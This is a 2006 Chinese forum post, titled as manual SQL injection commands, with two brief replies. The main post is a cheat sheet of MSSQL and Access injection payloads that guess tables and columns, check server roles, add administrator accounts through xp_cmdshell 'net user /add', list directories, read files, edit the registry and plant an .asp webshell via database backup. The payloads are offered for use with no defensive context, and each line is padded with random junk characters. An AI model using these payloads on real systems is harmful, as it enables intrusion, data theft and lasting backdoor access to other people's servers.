社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4056阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 j=W@P-  
  2.初步判断是否是mssql ;and user>0 c4 5?St  
\5hw9T&[B  
  3.注入参数是字符'and [查询条件] and ''=' fLNag~  
2h )8Fq_"  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' BSKEh"f  
skR,-:"8  
  5.判断数据库系统 JpK[&/Ct  
+_~,86  
  ;and (select count(*) from sysobjects)>0 mssql ~^$MA$/p  
g\&2s,  
  ;and (select count(*) from msysobjects)>0 access pds*2p)2  
:tLbFW[  
<Oa9oM},d  
Nd!c2`  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 r?^"6 5 =  
gI{ =0  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 <HF-2?`  
bMmra.x4L  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 6V2j*J  
B\[-fq  
  9.(1)猜字段的ascii值(access) 3gc"_C\$  
EwQae(PpA  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 :B.G)M\  
v9rVpYc"  
  (2)猜字段的ascii值(mssql) Q#pnj thM  
y]'CXCml)  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 dIJGB==  
FJwt?3\u5  
  10.测试权限结构(mssql) 7`fY*O6   
Dtt-|_EMS  
tOH0IE c  
zMGzReJ  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- tS<h8g_  
XWtiwf'K  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- S+ebO/$>  
9p`r7:  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 3dG4pl~  
%[ Zz0|A  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- lzDdD3Ouc  
k[9A,N^lZB  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- x=Mm6}/  
Wc|z7P~',%  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- z0Xa_w=  
m*oc)x7'  
  ;and 1=(select IS_MEMBER('db_owner'));-- rzu s  
tpYa?ZCM  
eYEc^nC,c)  
Hku=pr3Gn  
  11.添加mssql和系统的帐户 ZEGd4_ux  
/{X_ .fv<v  
  ;exec master.dbo.sp_addlogin username;-- 85z;Zt0{  
  ;exec master.dbo.sp_password null,username,password;-- cZi[(K  
w>vH8f  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- KlU qoJ;"  
d#\W hRE  
  ;exec master.dbo.xp_cmdshell 'net user username password "2;N2=~7  
C9jbv/c  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 0H[LS  
pjN:&#Y]  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- *Jt8  
}V]eg,.BJ  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- z-@ -O  
J+Bdz6lt  
t5) J;0/  
TyOH`5 D  
  12.(1)遍历目录 ~/|zlu*jpc  
_tj&Psp  
  ;create table dirs(paths varchar(100), id int) gs`> C(  
[5Y<7DS  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' <&U!N'CE  
(WE,dY+.  
  ;and (select top 1 paths from dirs)>0 D9-Lg%  
(q~0XE/ a  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;'3]{BGcU  
)ooWQ-%P  
&N\[V-GP2G  
0=;YnsY  
  (2)遍历目录 [6R fS  
7lU.Ni t  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- U9#WN.noG  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 5AOfp2O  
#C\4/g? =,  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Jqru AW<  
>Z\BfH  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 p5<2N  
/2@["*^$  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 4;*f1_;f~  
X/+OF'po  
0{R/<N  
I/B1qw;MN  
  13.mssql中的存储过程 VXIQw' Cq  
XP;x@I#l  
  xp_regenumvalues 注册表根键, 子键 d+}kg  
(1){A8=?o  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 3k' .(P|F  
de YyaV  
  xp_regread 根键,子键,键值名 aws"3O% uW  
.7Kk2Y  
  ;exec xp_regread A}G|Yfn  
E*|tOj9`1n  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Q)^g3J  
 .mPg0  
  xp_regwrite 根键,子键, 值名, 值类型, 值 rkYjq4Z@  
onl>54M^  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 f0oek{  
^\wl2  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 inF6M8 A1  
A/ 0qk  
  xp_regdeletevalue 根键,子键,值名 J_ J+cRwq  
?63&g{vA  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 \##`pa(8  
HXks_ix )  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值  Q2\  
[ rdsv  
',mW`ZN  
_N'75  
  14.mssql的backup创建webshell )|]Z>>%t  
@2' %o<lF  
  use model (ZPXdr  
7ZFJexN]  
  create table cmd(str image); o4)hxs  
F~_;o+e;X  
  insert into cmd(str) values (''); &KqVN]1+^  
^M|K;jt>  
  backup database model to disk='c:\l.asp'; !T'X 'Q  
.ECHxDp  
!R:y'Y%j  
cZQu*K^j  
  15.mssql内置函数 -<W2PY<  
m0( E kK  
  ;and (select @@version)>0 获得Windows的版本号 #Lka+l;L7  
i'tp1CI  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa o&-L0]i|  
 T-8J   
  ;and (select user_name())>0 爆当前系统的连接用户 77Q}=80GU;  
xmH-!Da  
  ;and (select db_name())>0 得到当前连接的数据库 \G;CQV#{9  
7 g6RiH}  
zvf3b!}  
[7W(NeMk  
  16.简洁的webshell $a.u05  
_CdROo6I  
  use model {}\CL#~y  
a8s4T$  
  create table cmd(str image); b!a %YLL  
^M Ey,  
  insert into cmd(str) values (''); n Ga1a  
T1N H eH>  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八